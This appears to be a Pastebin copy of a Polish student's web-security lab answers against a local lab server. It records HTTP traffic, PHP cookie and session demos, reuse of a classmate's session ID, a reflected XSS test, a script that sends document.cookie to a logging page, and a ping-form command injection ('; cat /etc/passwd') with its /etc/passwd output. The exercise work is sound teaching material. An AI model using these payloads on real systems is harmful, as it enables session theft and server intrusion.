API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 18th, 2018
165
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.25 KB | None | 0 0
raw download clone embed print report
  1. Zad 1
  2. 1. -
  3. 2. -
  4. 3. -
  5. 4. GET /1/ciasteczko.php HTTP/1.1
  6. Host: 192.168.158.106
  7. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  9. Accept-Language: en-US,en;q=0.5
  10. Accept-Encoding: gzip, deflate
  11. Referer: http://192.168.158.106/1/
  12. Connection: keep-alive
  13. Upgrade-Insecure-Requests: 1
  14.  
  15. HTTP/1.1 200 OK
  16. Date: Thu, 18 Jan 2018 09:37:17 GMT
  17. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  18. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  19. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:37:35 GMT; Max-Age=18; path=/
  20. Vary: Accept-Encoding
  21. Content-Encoding: gzip
  22. Content-Length: 88
  23. Connection: close
  24. Content-Type: text/html
  25.  
  26. 5. GET /1/ciasteczko.php HTTP/1.1
  27. Host: 192.168.158.106
  28. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  30. Accept-Language: en-US,en;q=0.5
  31. Accept-Encoding: gzip, deflate
  32. Referer: http://192.168.158.106/1/
  33. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  34. Connection: keep-alive
  35. Upgrade-Insecure-Requests: 1
  36.  
  37. HTTP/1.1 200 OK
  38. Date: Thu, 18 Jan 2018 09:49:59 GMT
  39. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  40. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  41. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:50:17 GMT; Max-Age=18; path=/
  42. Vary: Accept-Encoding
  43. Content-Encoding: gzip
  44. Content-Length: 88
  45. Connection: close
  46. Content-Type: text/html
  47.  
  48.  
  49. <html>
  50. <body>
  51.  
  52. Ciasteczko 'uzytkownik' nie jest ustawione.
  53. </body>
  54. </html>
  55.  
  56. ********************************************************
  57.  
  58. GET /1/ HTTP/1.1
  59. Host: 192.168.158.106
  60. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  61. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  62. Accept-Language: en-US,en;q=0.5
  63. Accept-Encoding: gzip, deflate
  64. Referer: http://192.168.158.106/
  65. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3; uzytkownik=jan
  66. Connection: keep-alive
  67. Upgrade-Insecure-Requests: 1
  68.  
  69. HTTP/1.1 200 OK
  70. Date: Thu, 18 Jan 2018 09:50:07 GMT
  71. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  72. Vary: Accept-Encoding
  73. Content-Encoding: gzip
  74. Content-Length: 421
  75. Connection: close
  76. Content-Type: text/html;charset=UTF-8
  77.  
  78. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  79. <html>
  80. <head>
  81. <title>Index of /1</title>
  82. </head>
  83. <body>
  84. <h1>Index of /1</h1>
  85. <table>
  86. <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
  87. <tr><th colspan="5"><hr></th></tr>
  88. <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
  89. <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="ciasteczko.php">ciasteczko.php</a></td><td align="right">2018-01-17 19:10 </td><td align="right">379 </td><td>&nbsp;</td></tr>
  90. <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="ciasteczko.txt">ciasteczko.txt</a></td><td align="right">2018-01-17 19:10 </td><td align="right">379 </td><td>&nbsp;</td></tr>
  91. <tr><th colspan="5"><hr></th></tr>
  92. </table>
  93. </body></html>
  94.  
  95. *****************************************************
  96. GET /1/ciasteczko.php HTTP/1.1
  97. Host: 192.168.158.106
  98. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  99. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  100. Accept-Language: en-US,en;q=0.5
  101. Accept-Encoding: gzip, deflate
  102. Referer: http://192.168.158.106/1/
  103. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3; uzytkownik=jan
  104. Connection: keep-alive
  105. Upgrade-Insecure-Requests: 1
  106.  
  107. HTTP/1.1 200 OK
  108. Date: Thu, 18 Jan 2018 09:50:08 GMT
  109. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  110. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  111. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:50:26 GMT; Max-Age=18; path=/
  112. Vary: Accept-Encoding
  113. Content-Encoding: gzip
  114. Content-Length: 102
  115. Connection: close
  116. Content-Type: text/html
  117.  
  118.  
  119. <html>
  120. <body>
  121.  
  122. Ciasteczko 'uzytkownik' jest ustawione.<br>Wartosc to 'jan'
  123. </body>
  124. </html>
  125. ***************************************************************
  126.  
  127.  
  128.  
  129. <html>
  130. <body>
  131.  
  132. Ciasteczko 'uzytkownik' nie jest ustawione.
  133. </body>
  134. </html>
  135.  
  136.  
  137.  
  138. 6.
  139. <?php
  140. $nazwa = "uzytkownik";
  141. $wartosc = "jan";
  142. setcookie($nazwa, $wartosc, time() + 18, "/");
  143. ?>
  144.  
  145. <html>
  146. <body>
  147.  
  148. <?php
  149. if(!isset($_COOKIE[$nazwa])) {
  150. echo "Ciasteczko '" . $nazwa . "' nie jest ustawione.";
  151. } else {
  152. echo "Ciasteczko '" . $nazwa . "' jest ustawione.<br>";
  153. echo "Wartosc to '" . $_COOKIE[$nazwa] . "'";
  154. }
  155. ?>
  156.  
  157. </body>
  158. </html>
  159.  
  160. 7. patrz 5
  161. 8. -
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173. Zad 2
  174. 1.
  175. Sesja rozpoczeta.
  176. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  177. Kolor: przezroczysty
  178.  
  179. 2.
  180. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  181. Kolor: przezroczysty
  182.  
  183. 3.
  184. Kolor: zolty.
  185.  
  186. 4.
  187. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  188. Kolor: zolty
  189.  
  190. 5.
  191. Sesja zakonczona
  192.  
  193. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  194. Kolor:
  195.  
  196. 6.
  197. curl --header "Cookie:JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3" http://192.168.158.106/2/2-wyswietl-zmienne.php
  198.  
  199. C:\Users\student>curl --header "Cookie:JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3" http://192.168.158.106/2/2-wyswietl-zmienne.php
  200.  
  201. <!DOCTYPE html>
  202. <html>
  203.  
  204. <body>
  205.  
  206. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3<br>Kolor: zolty<br>
  207. <br>
  208. <a href=".">Powrot</a>
  209. </body>
  210.  
  211. </html>
  212.  
  213. 7.
  214. JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5 -- kolegi
  215.  
  216. C:\Users\student>curl --header "Cookie:JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5" http://192.168.158.106/2/2-wyswietl-zmienne.php
  217.  
  218. <!DOCTYPE html>
  219. <html>
  220.  
  221. <body>
  222.  
  223. JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5<br>Kolor: asdasd
  224. <br>
  225. <br>
  226. <a href=".">Powrot</a>
  227. </body>
  228.  
  229. </html>
  230.  
  231. 8.
  232. -
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241. Zad 3
  242. 1.
  243. Witaj Grzegorz.
  244. Masz 21 lat(a).
  245.  
  246. 2. wyskoczyl xss
  247.  
  248. 3.
  249. Witaj <script>alert(1)</script>.
  250. Masz 21 lat(a)
  251.  
  252. 4. -
  253.  
  254.  
  255.  
  256.  
  257. Zad 4
  258. 1.
  259. Ciasteczko: 7a3iejqr25kl1oskl9hil4oeh3
  260.  
  261. plik:
  262. <html>
  263. <body>
  264.  
  265. <?php
  266. echo "Ciasteczko: " . $_COOKIE['JSESSIONID'] . "<br>";
  267.  
  268. $handle=fopen("ciasteczka.txt","a");
  269. fputs($handle, date("Y-m-d H:i:s ") . $_SERVER["REMOTE_ADDR"] . " " . $_COOKIE['JSESSIONID']."\n");
  270. fclose($handle);
  271.  
  272. ?>
  273.  
  274. </body>
  275.  
  276.  
  277. 2.
  278. 2018-01-18 11:20:19 192.168.160.188 7a3iejqr25kl1oskl9hil4oeh3
  279. </html>
  280.  
  281.  
  282.  
  283.  
  284. 3.
  285. <script>
  286. S=new String();S="http://192.168158.106/4/przechwyc.php" + document.cookie;
  287. XSS=new Image();
  288. XSS.src=S;
  289. </script>
  290.  
  291. 4.
  292. 2018-01-18 11:25:10 192.168.160.188 7a3iejqr25kl1oskl9hil4oeh3
  293.  
  294.  
  295. 5.???????
  296.  
  297.  
  298.  
  299.  
  300. Zad 5
  301. 1.
  302. serwer pingnolem:
  303. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  304. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.19 ms
  305. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.33 ms
  306.  
  307. --- 192.168.158.106 ping statistics ---
  308. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  309. rtt min/avg/max/mdev = 1.196/1.264/1.332/0.068 ms
  310.  
  311. 2.
  312. 192.168.158.106; cat /etc/passwd
  313. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  314. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.33 ms
  315. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.38 ms
  316.  
  317. --- 192.168.158.106 ping statistics ---
  318. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  319. rtt min/avg/max/mdev = 1.333/1.357/1.382/0.044 ms
  320. root:x:0:0:root:/root:/bin/bash
  321. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  322. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  323. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  324. sync:x:4:65534:sync:/bin:/bin/sync
  325. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  326. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  327. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  328. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  329. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  330. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  331. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  332. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  333. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  334. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  335. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  336. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  337. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  338. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  339. syslog:x:101:103::/home/syslog:/bin/false
  340. messagebus:x:102:105::/var/run/dbus:/bin/false
  341. avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  342. whoopsie:x:104:110::/nonexistent:/bin/false
  343. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  344. kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  345. rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
  346. speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  347. colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
  348. lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
  349. avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  350. hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  351. pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  352. saned:x:114:123::/home/saned:/bin/false
  353. f5:x:1000:1000:Xubuntu,,,:/home/f5:/bin/bash
  354. bind:x:115:125::/var/cache/bind:/bin/false
  355. tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
  356. dnsmasq:x:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  357. freerad:x:118:127::/etc/freeradius:/bin/false
  358. mysql:x:119:128:MySQL Server,,,:/nonexistent:/bin/false
  359. sshd:x:120:65534::/var/run/sshd:/usr/sbin/nologin
  360. ntp:x:121:129::/home/ntp:/bin/false
  361.  
  362.  
  363. 3.
  364.  
  365.  
  366. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  367. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.46 ms
  368. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.53 ms
  369.  
  370. --- 192.168.158.106 ping statistics ---
  371. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  372. rtt min/avg/max/mdev = 1.464/1.500/1.536/0.036 ms
  373. root:x:0:0:root:/root:/bin/bash
  374. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  375. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  376. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  377. sync:x:4:65534:sync:/bin:/bin/sync
  378. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  379. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  380. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  381. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  382. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  383. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  384. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  385. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  386. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  387. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  388. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  389. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  390. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  391. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  392. syslog:x:101:103::/home/syslog:/bin/false
  393. messagebus:x:102:105::/var/run/dbus:/bin/false
  394. avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  395. whoopsie:x:104:110::/nonexistent:/bin/false
  396. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  397. kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  398. rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
  399. speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  400. colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
  401. lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
  402. avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  403. hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  404. pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  405. saned:x:114:123::/home/saned:/bin/false
  406. f5:x:1000:1000:Xubuntu,,,:/home/f5:/bin/bash
  407. bind:x:115:125::/var/cache/bind:/bin/false
  408. tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
  409. dnsmasq:x:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  410. freerad:x:118:127::/etc/freeradius:/bin/false
  411. mysql:x:119:128:MySQL Server,,,:/nonexistent:/bin/false
  412. sshd:x:120:65534::/var/run/sshd:/usr/sbin/nologin
  413. ntp:x:121:129::/home/ntp:/bin/false
  414.  
  415.  
  416. TEN SERWER TEZ ODPOWIEDZIAL Z XSSEM!!!!!!!!!!!!!!
  417.  
  418.  
  419. Zad 6
  420. 1.
  421. plik testowy wewnatrz napis: test3
  422.  
  423.  
  424. 2.
  425. Transakcja odrzucona przez polityke BSS.
  426.  
  427. ID: 10960292571254886830
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!